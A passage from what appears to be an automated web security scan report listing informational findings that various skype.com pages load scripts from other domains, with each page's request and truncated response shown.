User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49848


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group video calling - host real-time video conferences on Skype</title>
   <meta name="descri
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.823. http://www.skype.com/intl/en/business/partners/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/partners/overview

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/partners/overview HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<head>
   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/business/complete.js" type="text/javascript" charset="utf-8"></script>
   
   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   
   
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
   
   
       <script src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/business/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/business/jquery/jquery.tools.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.824. http://www.skype.com/intl/en/business/skype-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/skype-connect

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/skype-connect HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 76230


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Connect... - Enhance your SIP-enabled PBX system with Skype</title>
   <meta name="desc
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.825. http://www.skype.com/intl/en/business/skype-connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/skype-connect/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/skype-connect/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 76230


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Connect... - Enhance your SIP-enabled PBX system with Skype</title>
   <meta name="desc
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.826. http://www.skype.com/intl/en/business/skype-manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/skype-manager

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/skype-manager HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69116


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Manager... - Control Skype across your entire business</title>
   <meta name="descripti
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.827. http://www.skype.com/intl/en/business/skype-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/business/skype-manager/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/business/skype-manager/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 69116


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Manager... - Control Skype across your entire business</title>
   <meta name="descripti
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.828. http://www.skype.com/intl/en/campaigns/toolbar/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/campaigns/toolbar/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/campaigns/toolbar/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46128


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Thanks for installing the Skype Toolbar</title>
   <meta name="description" content="" />
   <
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.829. http://www.skype.com/intl/en/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52537


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Internet Calls - Skype Features - Skype</title>
   <meta name="description" content="Love Sky
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.830. http://www.skype.com/intl/en/features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52537


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Internet Calls - Skype Features - Skype</title>
   <meta name="description" content="Love Sky
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.831. http://www.skype.com/intl/en/features/allfeatures/call-forwarding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-forwarding

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-forwarding HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 65391


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Forwarding - Skype Call Forwarding - Skype</title>
   <meta name="description" content="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.832. http://www.skype.com/intl/en/features/allfeatures/call-forwarding/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-forwarding/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-forwarding/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 65391


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Forwarding - Skype Call Forwarding - Skype</title>
   <meta name="description" content="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.833. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-phones-and-mobiles

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-phones-and-mobiles HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 67903


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Mobiles and Landlines - Cheap Calls - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.834. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-phones-and-mobiles/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-phones-and-mobiles/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 67903


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Mobiles and Landlines - Cheap Calls - Skype</title>
   <meta name="description" content=
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.835. http://www.skype.com/intl/en/features/allfeatures/call-transfer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-transfer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-transfer HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41903


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Transfer - Skype Call Transfer - Skype</title>
   <meta name="description" content="Call
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.836. http://www.skype.com/intl/en/features/allfeatures/call-transfer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/call-transfer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/call-transfer/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41903


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Call Transfer - Skype Call Transfer - Skype</title>
   <meta name="description" content="Call
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.837. http://www.skype.com/intl/en/features/allfeatures/caller-identification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/caller-identification

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/caller-identification HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43075


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Caller ID - Skype Caller Identification - Skype</title>
   <meta name="description" content="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.838. http://www.skype.com/intl/en/features/allfeatures/caller-identification/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/caller-identification/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/caller-identification/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43075


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Caller ID - Skype Caller Identification - Skype</title>
   <meta name="description" content="
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.839. http://www.skype.com/intl/en/features/allfeatures/conference-calls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/conference-calls

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/conference-calls HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
